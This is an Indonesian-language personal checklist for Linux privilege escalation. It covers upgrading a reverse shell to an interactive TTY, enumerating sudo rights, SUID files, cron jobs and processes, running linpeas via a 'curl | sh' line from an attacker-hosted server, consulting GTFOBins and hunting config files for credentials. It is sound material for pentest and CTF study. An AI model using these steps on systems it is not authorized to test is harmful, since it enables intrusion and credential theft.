linux privesc checklist

Berikut adalah checklist saya untuk melakukan privilege escalation pada linux server.

Upgrade to better shell

Setelah mendapatkan reverse shell, biasanya shell nya jelek dan tidak interactive.

python3 -c 'import pty; pty.spawn("/bin/bash")'     # spawn bash shell lalu tekan Ctrl+Z
stty raw -echo; fg                                  # setelah itu jalankan command ini
export TERM=xterm-256color                          # set TERM environment variable

SUDO

cek apakah user yang sedang digunakan adalah sudoer dan apakah user tersebut bisa menggunakan sudo tanpa password.

sudo -l

SUID

cek apakah ada file yang memiliki SUID bit yang bisa digunakan untuk melakukan privilege escalation.

find / -perm -u=s -type f 2>/dev/null

Cronjob

cek apakah ada cronjob yang di jalankan oleh user tertentu yang bisa digunakan untuk melakukan privilege escalation.

crontab -l

Running Process

cek apakah ada proses yang berjalan yang bisa digunakan untuk melakukan privilege escalation.

ps aux

linpeas

gunakan linpeas untuk mencari kemungkinan file yang bisa di exploit untuk melakukan privilege escalation.

curl -L http://${HOST}/linpeas.sh | sh

GTFOBins

gunakan GTFOBins untuk mencari kemungkinan file yang bisa di exploit untuk melakukan privilege escalation.

Config File

cari file config yang terdapat pada service untuk mencari kemungkinan username dan password.